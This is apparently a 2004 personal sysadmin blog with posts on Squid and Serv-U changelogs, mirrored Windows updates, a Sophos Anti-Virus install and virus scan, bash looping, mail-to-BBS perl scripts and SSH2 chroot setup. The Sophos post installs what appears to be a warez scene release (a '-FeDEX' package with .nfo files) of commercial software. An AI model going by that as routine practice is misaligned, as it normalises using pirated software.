http://www.squid-cache.org/Versions/v2/2.5/http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5.tar.bz2http://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5.tar.gzhttp://www.squid-cache.org/Versions/v2/2.5/squid-2.5.STABLE5-20040416.tar.bz21045200 Apr 16 08:11 squid-2.5.STABLE5-20040416.tar.bz245ed1b1cd492e3f529085d09c3ffc1b8 squid-2.5.STABLE5.tar.bz20946c53dbf2f091629092fd792df2820 squid-2.5.STABLE5.tar.gze11316d0f2a08075e6af6ad80d43c5cf squid-2.5.STABLE5-20040416.tar.bz2% @RH7.3Name : squid Relocations: (not relocateable)Version : 2.4.STABLE6 Vendor: Red Hat, Inc.Release : 6.7.3 Build Date: Fri 28 Jun 2002 08:45:26 AM CSTInstall date: Tue 10 Jun 2003 05:24:29 PM CST Build Host: stripples.devel.redhat.comGroup : System Environment/Daemons Source RPM: squid-2.4.STABLE6-6.7.3.src.rpmSize : 2659299 License: GPLPackager : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>Summary : The Squid proxy caching server.Description :Squid is a high-performance proxy caching server for Web clients,supporting FTP, gopher, and HTTP data objects. Unlike traditionalcaching software, Squid handles all requests in a single,non-blocking, I/O-driven process. Squid keeps meta data and especiallyhot objects cached in RAM, caches DNS lookups, supports non-blockingDNS lookups, and implements negative caching of failed requests.Squid consists of a main server program squid, a Domain Name Systemlookup program (dnsserver), a program for retrieving FTP data(ftpget), and some management and client tools.* Wed Jun 26 2002 Bill Nottingham <notting@redhat.com>- add various upstream bugfix patches* Sat Jun 22 2002 Tim Powers <timp@redhat.com>- automated rebuild* Fri May 24 2002 Tim Powers <timp@redhat.com>- automated rebuild* Sat Mar 23 2002 Bill Nottingham <notting@redhat.com>- 2.4.STABLE6--More--Changes to Squid-2.4.STABLE6 (March 19, 2002):http://www.squid-cache.org/Versions/v2/2.5/ChangeLog.txtChanges to squid-2.5.STABLE5 (1 Mar 2004): - cache.log message on "squid -k reconfigure" was slightly confusing, claiming Squid restarted when it just reread the configuration. - Bug #787: digest auth never detects password changes - Bug #789: login with space confuses redirector helpers - Bug #791: FQDNcache discards negative responses when using internal DNS - pam_auth fails on Solaris when using pam_authtok_get. Persistent PAM connections are unsafe and now disabled by default. - auth_param documentation clarifications and added default realm values making only the helper program a required attribute - Bug #795: German ERR_DNS_FAIL correction - Bug #803: Lithuantian error messages update - Bug #806: Segfault if failing to load error page - Bug #812: Mozilla/Netscape plugins mime type defined (.xpi) - Bug #817: maximum_object_size too large causes squid not to cache - Bug #824: 100% CPU loop if external_acl combined with separate authentication acl in the same http_access line - squid_ldap_group updated to version 2.12 with support for ldaps:// (LDAPv2 over SSL) and a numer of other improvements. - Bug #799: positive_dns_ttl ignored when using internal DNS. - Bug #690: Incorrect html on empty Gopher responses - Bug #729: --enable-arp-acl may give warning about net/route.h - Bug #14: attempts to establish connection may look like syn flood attack if the contacted server is refusing connections - errorpage README files included in the distribution again showing who contributed which translation - Bug #848: connect_timeout connect_timeout ends up twice the length. forward_timeout option added to address this. - Bug #849: DNS log error messages should report the failed query - Bug #851: DNS retransmits too often - Bug #862: Very frequently repeated POST requests may cause a filedescriptor shortage due to persitent connections building up - Bug #853: Sporatic segmentation faults on aborted FTP PUT requests - Bug #571: Need to limit use of persistent connections when filedescriptor usage is high - Bug #856: FTP/Gopher Icon URLs are unneededly complex and often does not work properly - Bug #860: redirector_access does not handle "slow" acls such as "dst" or "external" requiring a external lookup. - Bug #865: Persistent connection usage too high after sudden burst of traffic. - Bug #867: cache_peer max-conn=.. option does not work - Bug #868: refuses to start if pid_filename none is specified - Bug #887: LDAP helper -Z (TLS) option does not work - Bug #877: Squid doesn't follow telnet protocol on FTP control connections - Bug #908: Random auth popups and account lockouts when using ntlm - Support for NTLM_NEGOTIATE exchanges with ntlm helpers - Bug #585: cache_peer_access fails with NTLM authentication - Bug #592: always/never_direct fails with NTLM authentication - wbinfo_group update for Samba-3 - Bug #892: helpers/ntlm_auth/SMB/ fails to compile on FreeBSD 5.0 - Bug #924: miss_access restricts internal and cachemgr requests even if these are local - Bug #925: auth headers send by squidclient are mildly malformed - Bug #922: miss_access and delay_access and several other authentication related bug fixes. - Bug #909: Added ARP acl support for FreeBSD - Bug #926: deny_info with http_reply_access or miss_access - Bug #872: reply_body_max_size problems when using NTLM auth More...

Posted by windtear at 4:18 AM

April 16, 2004

Serv-U FTP Server Version 5.0 (5.0.0.9) Release 我爱网络

http://www.Serv-U.com/(Serv-U is published by RhinoSoft.com)ftp://ftp.cat-soft.com/ServUSetup.exe3,881,340 bytes 2004/04/15 15:18:4168cf5d28166552ee3a92113b0280a794 *ServUSetup.exeVersion 5.0 (5.0.0.9) Released 15 April 2004--------------------------------------------* Fixed bug in performance counters, value for 'Total KB transferred' was wrong.* Fixed bug in path parser causing crashes for certain paths.* Added ODBC connection retry in case connection fails immidiately after server start.* Changed registration key mechanism, key is valid when the last major version was released within update period.* Ported code to Borland C++ Builder v6.* Fixed a number of Admin bugs causing crashes.* Fixed bug in Daemon dir listing code causing crashes.* Fixed bug causing crashes on Daemon exit.* Changed MDTM so it can now change the date/time of directories as well as files.* Added support for SSCN command.* Added better crash loging to Administrator program, logs to file ServUCrashReport.elf.Version 5.0 (5.0.0.4) Released 23 February 2004-----------------------------------------------* Changed Windows' port checking code to better detect ports in paths.* Fixed bug where enabling/disabling directory cache does not get saved.* Fixed bug of tray-icon not starting automatically upon reboot.* Fixed SQL statement bug for lookups in dir access and IP access rules tables.* Added domain settings option to auto-create homedir if it doesn't exist.* Added automatic connection retry in case ODBC connectivity is lost.* Fixed bug in access DLL mechanism, causing events to not get dispatched under certain circumstances.* Fixed bug causing SSL transfers to fail when a speed limit is used.* Fixed bug in MDTM command that potentially caused the daemon to crash.Version 5.0 (5.0.0.0) Released 20 January 2004----------------------------------------------* Added support for user account setting that requires a secure connection to log in.* Added 'Apply' and 'Restore' buttons to various panes.* Added support for NLST command to list dirs on a per-domain basis.* Fixed bug in deleting user accounts starting with same partial name.* Added 'up' button to Administrator program. * Added XCRC support.* Added support for independent server-level uplink/downlink bandwidth limits.* Changed Admin code to trap certain exceptions in XP.* Fixed bug not showing custom domain message for "no anymous access".* Added code to auto-create user's homedir if it does not exist yet.* Added support for more SSL ciphers.* Added code to enforce that domain/group admins cannot assign rights they don't have.* Changed symbolic message parameters to show "unlimited" when needed.* Added support for putting individual domains online/offline.* Fixed bug causing crashes when using "%ServerAvg" message directive.* Fixed XP problem with long server startup times.* Fixed bug in dir listing of root dirs with path as argument.* Changed check for the need of a secure connection from PASS to USER command.* Fixed bug with Windows 2003 in setting up listening sockets.* Changed MDTM command to work with UTC instead of local time.* Changed PORT command to block use of ports below 1024.* Fixed bug causing use of ports (ie. printing-via-FTP) to fail.* Changed NLST command to return 550 error reply in case no entries are found.* Made tray icon persistent in case of Explorer crashes/restarts.* Added ODBC database support.* Fixed bug causing disk quota to fail under certain conditions.* Added license volume checking.* Added per-domain user/group account settings cache time-to-live.* Changed password encryption from a server-wide setting to a per-domain setting.* Changed listening socket handling, now running in seperate thread.* Fixed bug in dir listing cache, when caching more than 63 entries.* Fixed buffer overflow bug in MDTM command.* Added support for CLNT command.* Added support for Corporate Edition.Version 4.1 (4.1.0.3) Released 3 January 2003THE SERV-U PROMO MESSAGE========================This is Serv-U version 5.0, a flexible FTP server (or Daemon) for all32-bit versions of MS-Windows (Win95, Win98, WinME, NT, Win2000,Win2003,XP). It turns any PC with a network connection into an FTP site onthe Internet.Serv-U offers the following:* Easy to set up and use.* A Windows standard, with over 50000 registered users!* Support for Secure-FTP through SSL/TLS.* Support for ODBC databases for accounts.* Lots of security through passwords, read/write/append/modify rights per directory or file for each user (including Anonymous), and access restrictions based on IP address.* Fast and rock solid!* Multiple 'virtual' FTP servers can be set up on a single instance of Serv-U.* Server can be administered remotely.* Supports S/KEY one-time passwords.* Can run as a native 'system service' in NT, Windows 2000/2003 and Windows 95/98/ME/XP.* Support for temporary accounts that are automatically deleted upon expiration.* Support for UL/DL ratios, disk quota limitations, network bandwidth limiting, and automatic anti-anti-time-out plus anti-hammering measures.* Full UNC path support.* Support for virtual paths. Directories or drives can be mapped to any location in a user's directory structure.* Support for 'links' such as those used in UNIX.* Full support for all 'ls' directory listing options.* Support for messages to users, or from users to the server.* Users can be put into groups for easy maintenance of large numbers.* A complete implementation of the FTP standard in RFC959, RFC1123, RFC1760, RFC2228, RFC2246, RFC2289, RFC2389 and the Secure-FTP draft.* Supports resuming of file uploads and downloads.* Configurable messages for sign-on, sign-off, login, and directory changes.* Has time-out and time-limit features, so connections are automatically cleared when idle, hung, or connected too long.* Easy to setup and maintain through a separate administrator program. For automated maintenance the settings are stored in either an .INI file, registry, or ODBC database of simple format.* Has an open architecture which makes monitoring, changing and extending the server behavior possible through external DLLs.* Logs all transactions to file and screen that can be read by other applications. Includes unique session IDs, time, and date stamps. More...

Posted by windtear at 5:06 PM

W2K_CHS 5 updates (20040414) up to blueink 我爱网络

直接从 SUS 拷出来的完整版不需要安装过程从网络下载东西了ftp://soft.blueink.org:2121/incoming/other/WindowsUpdate---5个关键更新/ (同目录已有人上传了 2k3 和XP的)W2K_CHS/├─com_microsoft.Q837009_OE6_SP1│ OE6.0sp1-KB837009-x86-CHS_3f82d910a06a016e62e085b3791bb5e.exe│├─com_microsoft.Q831167_IE6_SP1│ Q831167_7c1186c6a85526a0a88f4d6d01c8bba.exe│├─com_microsoft.837001_W2K_SP5_WinSE_84422│ Windows2000-KB837001-x86-CHS_f9aef1eaf7c9990dfad809b64dff6d4.EXE│├─com_microsoft.828741_W2K_SP5_WinSE_61239│ Windows2000-KB828741-x86-CHS_e5de3240894fc24df06671c42a613c4.EXE│└─com_microsoft.835732_W2K_SP5_WinSE_84207 Windows2000-KB835732-x86-CHS_779d1b67c993ed5edaeeb6706f37a0d.EXE[相关文章]http://www.smth.edu.cn/pc/pccon.php?id=10&nid=21253&s=all More...

Posted by windtear at 11:09 AM

April 15, 2004

SOPHOS.ANTIVIRUS.V3.80.MULTILANGUAGE.LINUX-FeDEX 我爱网络

% for i in *.zip;do echo $i;unzip -o $i;done (unzip -o *.zip didn't work)% rm -f *.zip% unrar x -o+ fedl80.rar% rm -f fedl80.r??% cd SOPHOS.ANTIVIRUS.V3.80.MULTILANGUAGE.LINUX-FeDEX/% ltotal 25783-rw-r--r-- 1 root root 1104 Nov 21 07:29 dm.nfodrwxr-xr-x 2 root root 2520 Mar 18 20:48 sav-install/-rw-r--r-- 1 root root 8850917 Mar 26 13:45 linux.intel.libc6.tar.Z-rw-r--r-- 1 root root 8760745 Mar 26 13:46 linux.intel.libc6.glibc.2.2.tar.Z-rw-r--r-- 1 root root 8765449 Mar 26 13:46 linux.intel.libc5.tar.Z-rw-r--r-- 1 root root 7715 Mar 26 13:46 fedex.nfo-rw-r--r-- 1 root root 740 Mar 26 13:47 file_id.diz% tar Zxvf linux.intel.libc6.glibc.2.2.tar.Z sav-install/sav-install/vdl-3.80.datsav-install/vdl01.vdbsav-install/vdl02.vdbsav-install/vdl03.vdbsav-install/vdl04.vdbsav-install/vdl05.vdbsav-install/vdl06.vdbsav-install/vdl07.vdbsav-install/vdl08.vdbsav-install/vdl09.vdbsav-install/vdl10.vdbsav-install/vdl11.vdbsav-install/vdl12.vdbsav-install/vdl13.vdbsav-install/vdl14.vdbsav-install/vdl15.vdbsav-install/vdl16.vdbsav-install/install.shsav-install/Readunix.txtsav-install/Readunix_de.txtsav-install/Readunix_es.txtsav-install/Readunix_euc.txtsav-install/Readunix_fr.txtsav-install/Readunix_it.txtsav-install/Readunix_pt_br.txtsav-install/Readunix_utf.txtsav-install/Install.txtsav-install/Install_de.txtsav-install/Install_es.txtsav-install/Install_euc.txtsav-install/Install_fr.txtsav-install/Install_it.txtsav-install/Install_pt_br.txtsav-install/Install_utf.txtsav-install/installmsg.txtsav-install/installmsg_de.txtsav-install/installmsg_es.txtsav-install/installmsg_euc.txtsav-install/installmsg_fr.txtsav-install/installmsg_it.txtsav-install/installmsg_pt_br.txtsav-install/installmsg_utf.txtsav-install/sweep.1sav-install/icheckd.1sav-install/icheckd.conf.5sav-install/icheckd_de.1sav-install/icheckd_de.conf.5sav-install/icheckd_es.1sav-install/icheckd_es.conf.5sav-install/icheckd_euc.1sav-install/icheckd_euc.conf.5sav-install/icheckd_fr.1sav-install/icheckd_fr.conf.5sav-install/icheckd_it.1sav-install/icheckd_it.conf.5sav-install/icheckd_pt_br.1sav-install/icheckd_pt_br.conf.5sav-install/icheckd_utf.1sav-install/icheckd_utf.conf.5sav-install/sweep_de.1sav-install/sweep_es.1sav-install/sweep_euc.1sav-install/sweep_fr.1sav-install/sweep_it.1sav-install/sweep_pt_br.1sav-install/sweep_utf.1sav-install/eminstall.txtsav-install/eminstall.shsav-install/calcmd5sav-install/icheckdsav-install/icmess.datsav-install/libsavi.so.3.2.07.060sav-install/sweepsav-install/swpmess.dat% ltotal 8559drwxr-xr-x 2 root root 2520 Mar 18 20:48 sav-install-rw-r--r-- 1 root root 8760745 Apr 15 23:13 linux.intel.libc6.glibc.2.2.tar.Z% cd sav-install/% ./install.sh Sophos Anti-Virus installation utility [Linux/Intel]Copyright (c) 1998,2003 Sophos Plc, Oxford, EnglandError: The 'sweep' user does not exist on your system. Please consult the documentation for more information.% useradd sweep% ./install.sh Sophos Anti-Virus installation utility [Linux/Intel]Copyright (c) 1998,2003 Sophos Plc, Oxford, EnglandEnsure that IDE files for this release are now downloaded into /usr/local/sav.% sweep --helpSWEEP virus detection utilityVersion 3.80, April 2004 [Linux/Intel]Includes detection for 89009 viruses, trojans and wormsCopyright (c) 1989,2004 Sophos Plc, www.sophos.comSystem time 23:15:56, System date 15 April 2004Command line qualifiers are: --helpWarning: SWEEP messages loaded from default locale en_GBThe following options may be prefixed with 'n' to invert their meaning(for example, '-nsc' is the inverse of '-sc'). [*] indicates the optionis the default: -sc [*] : SWEEP inside dynamically compressed executables -f [ ] : Full SWEEP -di [ ] : Disinfect infected items -s [*] : Run silently (do not list files swept) -c [*] : Ask for confirmation before disinfection/deletion -b [*] : Sound bell on virus detection -all [ ] : SWEEP all files -rec [*] : Do recursive SWEEP -remove [ ] : Remove infected objects -dn [ ] : Display names of files as they are scanned -ss [ ] : Don't display anything except on error or virus -eec [ ] : Use extended error codes -ext=XXX,.. : Specify additional extensions to SWEEP -p=<file> : Write to logfile <file> -idedir=<dir> : Read IDEs from alternative directory -v : Display complete version information and exit -h : Display this help and exitThe following options are related to archives and other special file types: -zip [ ] : SWEEP inside ZIP archives -gzip [ ] : SWEEP inside GZIP compressed files -arj [ ] : SWEEP inside ARJ archives -cmz [ ] : SWEEP inside Unix-compressed files -tar [ ] : SWEEP inside TAR archives -rar [ ] : SWEEP inside RAR archives -archive [ ] : All of the above -cab [ ] : SWEEP inside Microsoft Cabinet files -loopback [ ] : SWEEP inside loopback-type files -mime [ ] : Scan files encoded in MIME format -oe [ ] : Scan Microsoft Outlook Express mailbox files (requires -mime) -tnef [ ] : SWEEP inside TNEF filesThe following options may be prefixed with 'no-' to invert their meaning(for example, '--no-reset-atime' is the inverse of '--reset-atime'. [*]indicates the option is the default: --reset-atime [*] : Reset file access time after SWEEPingThe following options are Unix-specific, and may be prefixed with 'no-'to invert their meaning (for example, '--no-follow-symlinks' is theinverse of '--follow-symlinks'). [*] indicates the option is the default: --follow-symlinks [*] : SWEEP the object pointed to by symbolic links --stay-on-filesystem [ ] : Attempt not to leave the starting filesystem (i.e. do not traverse mount points) --stay-on-machine [*] : Attempt not to leave the starting machine (i.e. do not traverse remote mount points) --skip-special [*] : Do not scan 'special' objects (/dev, /proc, /devices etc.) --backtrack-protection [*] : Prevent repetition of work ('backtracking') due to symbolic links --preserve-backtrack [*] : Preserve the backtracking information for the duration of this run --examine-x-bit [ ] : Check files with an execute bit set --show-file-details [ ] : Show file ownership and permissions when displaying filenames --quarantine [ ] : (Simple form of --quarantine option) If file is infected with virus, attempt to change file owner to user running SWEEP, and permissions to -r-------- (0400) --quarantine:<uid=nnn>,<user=username>, <gid=nnn>,<group=groupname>,<mode=ppp> [ ] : (Detailed form of --quarantine option) If file is infected with virus, attempt to change file ownership, group ownership, and permissions to those specified as uid/username, gid/groupname, and mode. --args-file=<file> : Read command line arguments (both options and directory/filenames) from file, taking arguments from the command line again when the end of the file is reached. A value of - for <file> specifies taking input from stdin. A small number of command line options may not be used within an args file, namely:- -eec, -neec, -p=, -s, -ns, -dn, -ndn. These can only be specified from the command line.The following options are specific to Linux and FreeBSD only. -mbr [ ] : SWEEP master boot records on all (physical) hard disks -bs=X,... [ ] : SWEEP boot sector of each drive listed -bs [ ] : SWEEP boot sectors on all (logical) drives -cdr=X,...[ ] : Scan boot sector in bootable image of each CD drive listedYou need to have superuser rights in order to scan boot sectors.......% pwd/var/mail/Mail/e/b/windtear@ipcn.org/Mail% sweep 282041380.20400SWEEP virus detection utilityVersion 3.80, April 2004 [Linux/Intel]Includes detection for 89009 viruses, trojans and wormsCopyright (c) 1989,2004 Sophos Plc, www.sophos.comSystem time 23:19:54, System date 15 April 2004Warning: SWEEP messages loaded from default locale en_GBQuick Sweeping 1 file swept in 14 seconds.No viruses were discovered.End of Sweep.......% /usr/local/bin/sweep -nc -remove /datacenter/datacenter/SWEEP virus detection utilityVersion 3.80, April 2004 [Linux/Intel]Includes detection for 89009 viruses, trojans and wormsCopyright (c) 1989,2004 Sophos Plc, www.sophos.comSystem time 23:22:49, System date 15 April 2004Command line qualifiers are: -nc -removeWarning: SWEEP messages loaded from default locale en_GBQuick Sweeping......1848 files swept in 1 minute and 7 seconds.1 error was encountered.345 viruses were discovered.345 files out of 1848 were infected.Please send infected samples to Sophos for analysis.For advice consult www.sophos.com, email support@sophos.comor telephone +44 1235 559933End of Sweep.% /usr/local/bin/sweep -nc -remove /datacenter/datacenter/SWEEP virus detection utilityVersion 3.80, April 2004 [Linux/Intel]Includes detection for 89009 viruses, trojans and wormsCopyright (c) 1989,2004 Sophos Plc, www.sophos.comSystem time 23:22:49, System date 15 April 2004Command line qualifiers are: -nc -removeWarning: SWEEP messages loaded from default locale en_GBQuick SweepingCould not check /datacenter/datacenter/incoming/临时文件/考勤安装/我的公文包/教学文档/培训人员通信录.doc (corrupt) 1503 files swept in 38 seconds.1 error was encountered.No viruses were discovered.End of Sweep.[相关文章]http://www.smth.edu.cn/pc/pccon.php?id=10&nid=15837&s=all More...

Posted by windtear at 11:28 PM

bash scripts sample - for loop v.s. xargs 我爱网络

-----> Demand:getpoints 1.jpg 1.pointsgetpoints 2.jpg 2.points...% cat list.txt1.jpg2.jpg...-----> Solution:1.for i in `cat list.txt`;do ./getpoints $i $i.points;donerename jpg.points points *.points2.(by newclear)cat list.txt | sed -e "s/\..*//" | xargs --replace ./getpoints {}.jpg {}.points-----> Demo% for i in `cat list.txt`;do echo $i $i.points;done1.jpg 1.jpg.points2.jpg 2.jpg.points3.jpg 3.jpg.pointsrename jpg.points points *.points% cat list.txt | sed -e "s/\..*//" | xargs --replace echo {}.jpg {}.points1.jpg 1.points2.jpg 2.points3.jpg 3.points More...

Posted by windtear at 6:17 PM

Update Plugins for TC (Total Commander 6.03) 我爱网络

rpm.wcx 1.1.0.188 2002/12/02 15:09:12cpio.wcx 1.0.0.79 2002/09/24 17:24:40iso.wcx 1, 6, 9, 0 2004/04/08 14:31:28msi-plus.wcx 0.4 2003/11/19 09:13:00img.wcx *1.5 2003/07/31 00:00:00bzip2dll.wcx *1.0 2001/12/19 15:11:10chmdir.wcx *0.21 beta 2003/12/08 14:20:00z.wcx 0.2 2001/10/04 00:00:00-----> Listermmedia.wlx 2, 4, 4, 0 2004/01/19 08:56:00office.wlx *1.1+ 2003/11/19 09:13:00pdfview.wlx 1, 0, 5, 0 2004/02/04 20:36:00fileinfo.wlx 2, 0, 1, 0 2004/03/20 17:05:50ieview.wlx *Beta 4 2002/12/21 00:00:00excellence.wlx 1.02 2004/01/26 02:02:42flashview.wlx 1.2.0.0 2003/12/02 23:34:08SynUs.wlx 1.6.0.0 2003/10/23 02:10:40syntaxcolorizer.wlx 1, 1, 0, 0 2003/02/24 21:19:54Imagine.wlx 0.8.4.0Beta2 2004/03/18 08:40:00-----> FilesysPROCFS.wfx *2.0 2003/11/19 09:15:00Privileges.wfx 1, 0, 0, 1 2002/11/27 00:00:00Services.wfx 2, 4, 0, 203 2004/03/10 16:29:00app2srv.exe *Services2.4 2004/03/10 19:53:00UnInstTC.wfx *1.52 2004/01/31 16:53:00registry.wfx 2, 0, 0, 0 2003/11/26 13:57:00startupguard.wfx 0.5.1.56 2003/11/05 17:00:00 More...

Posted by windtear at 4:02 PM

Total Commander 6.03 Final - TC 我的最爱 (原wincmd - Windows Commander) 我爱网络

http://www.ghisler.com/Total Commander, Version 6.03, is a Shareware file manager for Windows® 95/98/ME/NT/2000/XP, and Windows® 3.1.New (April 14): Total Commander 6.03 for Windows releasedNew (August 22): Total Commander CE/Pocket 1.2 releasedNovember 2: Name change to Total Commander!Important note: Changes for orders from Germany, U.K. and Belgium!Features in Total Commander 6.03 now include : Two file windows side by side Multiple language More...

Posted by windtear at 10:38 AM

my attemp about 2 mail and 1 bbs 我爱网络

qmail and anotherbbsmail (perl script)mailgate.pl (perl script)mail2bbs (exe binary with suid)-rwsr-x--- 1 bbs bbs 465274 Aug 28 2003 mail2bbs-rwxr-x--- 1 bbs bbs 2763 Apr 14 18:34 mailgate.pl-rwxr-x--- 1 bbs bbs 2039 Apr 14 20:17 bbsmailport 25 by another smtpddeliver by an exe named by localwhat i can do iswrite a perl script 'local' replace the orig onejudge the the deliver target to the 'another' email system or bbs?virusspamlog...if ( $ARGV[0] ne "" ) { $file_var=$ARGV[0];} else { print "usage: local.pl 237453115.32606\n"; exit;}...($file_name,$file_ext) = split(/\./,$file_var);$dir_name=$file_name%32;if (length($dir_name) == 1) { $dir_name="0".$dir_name;}-----> but defeated by itmaybe coz of permissionso another script is coming...`su - bbs -c "/home/bbs/bin/bbsmail $to_user /$another_mail_dir/$dir_name/$file_var"`;unlink ...cat /dev/null > $the_to_do_list_file More...

Posted by windtear at 12:34 AM

April 14, 2004

MICROSOFT SECURITY UPDATES ALERT April 13, 2004 - Windows Security Updates for April 2004 我爱网络

Windows Security Updates for April 2004Published: April 13, 2004http://go.microsoft.com/?LinkID=466770http://www.microsoft.com/security/security_bulletins/200404_windows.aspThe Microsoft® Windows® security updates for April 2004 address newly discovered issues in Windows, including Microsoft Outlook Express, a component of Windows. If you have any of the listed software installed on your computer, you should visit the Windows Update Web site to install related updates.Skip the details and go to Windows More...

Posted by windtear at 11:39 AM

挑战安全 - ssh2 & chroot 我爱网络

chroot(PATH)bindevetclibprochttp://www.ssh.org/http://www.ssh.com/support/downloads/secureshellserver/non-commercial.htmlftp://ftp.ssh.com/pub/ssh > ls-rwxrwxr-x 1 2012 2012 2269281 Dec 3 15:24 ssh-3.2.9.1.tar.gz-rwxrwxr-x 1 2012 2012 72 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-gpg-rwxrwxr-x 1 2012 2012 280 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-pgp2-rwxrwxr-x 1 2012 2012 65 Dec 3 16:12 ssh-3.2.9.1.tar.gz.sig-pgp5ssh-3.2.9.1.tar.gzModify: Wed Dec 3 21:24:22 2003md5sumf3ed49f13419d97dc1d0d3bfb4bb99bf ssh-3.2.9.1.tar.gzsshd2: SSH Secure Shell 3.2.9.1 (non-commercial version) on i686-pc-linux-gnu-----> etc configsknownhosts/hostkeys/subconfig/ssh_dummy_shell.outsshd2_config.examplessh2_config.examplessh2_confighostkey.pubhostkeysshd2_configsubconfig/ anonymous.example host_ext.example host_int.example user.example% cat sshd2_configPort 22SettableEnvironmentVars LANG,LC_(ALL|COLLATE|CTYPE|MONETARY|NUMERIC|TIME),PATH,TERM,TZDenyGroups nobody,guest,anonymousPermitRootLogin noChRootGroups ftpadminsubsystem-sftp sftp-server-----> READMESSH2 Binaries============= ssh2 The SSH2 client. sshd2 The SSH2 daemon. sftp2 The SFTP client (needs ssh2). Type "?" in the command line for help. sftp-server2 The SFTP server (executed by sshd2). scp2 The SCP client. ssh-keygen2 The utility for generating keys. Use -h for help. ssh-add2 Add identities to the authentication agent. ssh-agent2 The authentication agent. ssh-askpass2 X11 utility for querying passwords. ssh-signer2 A small program that signs "hostbased" authentication packets. Executed by ssh2, and for proper function, must be suid root. (This is done by 'make install'.) ssh-probe2 Program to probe a given network for ssh2 servers. See ssh-probe(1) and sshd2_config(5) for MaxBroadcastsPerSecond. ssh-dummy-shell Can be used as a restricted shell when only file transfer or tcp forwarding functionality is desired. ssh-certenroll2 A certificate enrollment client (only in commercial distribution) sshd-check-conf A configuration checker utility for use with sshd2 Installation============ % tar zxvf ssh-3.x.y.tar.gz % ./configure% make# make installThis should set everything up and create the host key.The old files are moved to *.old files. If you don't want themaround, goto apps/ssh and run # make clean-up-oldwhich will delete them. ssh2 files=========== Public keys have a .pub suffix, private keys have no suffix. For example: id_dsa_1024_a A 1024-bit DSA private key id_dsa_1024_a.pub The corresponding public key There is no "known_hosts", as in ssh1. The host keys are stored in separate files in ~/.ssh2/hostkeys . ~/.ssh2/hostkeys/key_xxxx_yyyy.pub ----------------------------- This would be the public host key of the ssh2 daemon running in port xxxx of the host yyyy. /etc/ssh2/hostkey.pub and /etc/ssh2/hostkey ----------------------------------------- Public and private hostkeys for sshd2. Created by "make install". If this is not created by "make install" or you need to recreate your host keypair, run # rm /etc/ssh2/hostkey* # ssh-keygen2 -P /etc/ssh2/hostkey ~/.ssh2/identification ---------------------- Lists the private keys that are offered to the server in public-key user authentication. # identification IdKey id_dsa_1024_a This means that the private key in the file ~/.ssh2/id_dsa_1024_a is used for public key authentication. Use CertKey instead of IdKey if certificates are used (only in commercial distribution). ~/.ssh2/authorization --------------------- Lists the public keys that are accepted for authentication on this host. # authorization Key id_dsa_1024_a.pub This means that anyone who holds the matching private key to the public key in the file $USER/.ssh2/id_dsa_1024_a.pub can log in as $USER. /etc/ssh2/sshd2_config -------------------- The server configuration file, copied here by "make install". See the man page for details. The line: subsystem-sftp sftp-server means that when the subsystem "sftp" is requested, the command "sftp-server" is started. For example, if our sshd2_config reads: subsystem-quux echo "fim fam foo" the command "ssh2 host -s quux" would simply print the text "fim fam foo". ~/.ssh2/ssh2_config ------------------- The client configuration file. See the global client config file ssh2_config in /etc/ssh2. ~/.ssh2/knownhosts/xxxxyyyy.pub ------------------------------- These are the public host keys of the hosts that a user wants to log from using host based authentication (equivalent with SSH1's RhostsRSAAuthentication). Also, a user has to set up her/his ~/.shosts (which only SSH uses) or ~/.rhosts file (insecure, as it is also used by the r*-commands). If the username is the same in both hosts, it is adequate to put the public hostkey to /etc/ssh2/knownhosts and add the host's name to /etc/shosts.equiv (or /etc/hosts.equiv). xxxx denotes the hostname (FQDN) and yyyy the public key algorithm of the key. For example, zappa.foo.fi's hostkey algorithm is ssh-dss. The hostkey would be named zappa.foo.fi.ssh-dss.pub in the knownhosts directory. Possible values for publickey-algorithms are "ssh-dss" and "ssh-rsa" (without the quotes). /etc/ssh2/knownhosts/xxxxyyyy.pub --------------------------------- As above, but system-wide. These can be overridden by the user by putting a file with the same name to her/his ~/.ssh2/knownhosts directory. /etc/hosts.equiv and /etc/shosts.equiv -------------------------------------- Used to check whether authentication from host is allowed using host based authentication. In its simplest form, the file contains host names, one per line. For more information, see 'man sshd2'. ~/.rhosts and ~/.shosts ----------------------- This file contains host-username-pairs, separated by spaces, one per line. The given user from the specified host is allowed to log in without a password. For more information, see 'man ssh2' and 'man sshd2'.===== chroot@ v2.4.0 by flyriversshchsession.cssh_session_init_env if (!strcmp("ftpadmin", ssh_group_name(session->common->user_data))) { char home_dir[512]; snprintf(home_dir, sizeof(home_dir), "/home/%s", user_name); ssh_child_set_env(envp, envsizep, "HOME", home_dir); } else ssh_child_set_env(envp, envsizep, "HOME", user_dir);ssh_channel_session_childsshunixuser.c@ v3.2.9.1sshchsession.cssh_session_init_env 492 if (ssh_user_needs_chroot(session->common->user_data, session->common)) 493 user_dir = "/"; 494 else 495 user_dir = ssh_user_dir(session->common->user_data);% grep -rin 'chroot' ././FAQ:27: 2.4: Q: How do I set up chrooted accounts (w/ restricted shell access, and./FAQ:249:Q: How do I set up chrooted accounts (with restricted shell access, and./lib/sshsession/sshunixuser.c:1427: const char *chroot_dir,./lib/sshsession/sshunixuser.c:1522: /* chrooting at this point. */./lib/sshsession/sshunixuser.c:1523: if (chroot_dir)./lib/sshsession/sshunixuser.c:1525: if (chroot(chroot_dir) < 0)./lib/sshsession/sshunixuser.c:1527: ssh_warning("Chroot to '%s' failed!", chroot_dir);./lib/sshsession/sshunixuser.c:1536: /* XXX does chroot work after this? If not, this should be done after./lib/sshsession/sshunixuser.c:1537: chroot (and before setuid()). */./lib/sshsession/sshuser.h:95: called before chroot()ing. */./lib/sshsession/sshuser.h:101: ``chroot_dir'' call chroot() with this as argument in the approriate./lib/sshsession/sshuser.h:103: the user. Will return FALSE, if chroot() fails. Note./lib/sshsession/sshuser.h:106: be NULL, in which case the user is not chrooted../lib/sshsession/sshuser.h:114: const char *chroot_dir,./NEWS:4:ssh-pubkeymgr and ssh-chrootmgr./apps/ssh/sshchsession.c:248:/* Return TRUE if user is configured to have home directory chrooted. */./apps/ssh/sshchsession.c:250:Boolean ssh_user_needs_chroot(SshUser user, SshCommon common);./apps/ssh/sshchsession.c:252:/* Return TRUE if user is configured to have home directory chrooted. */./apps/ssh/sshchsession.c:254:Boolean ssh_user_needs_chroot(SshUser uc, SshCommon common)./apps/ssh/sshchsession.c:257: "won't be 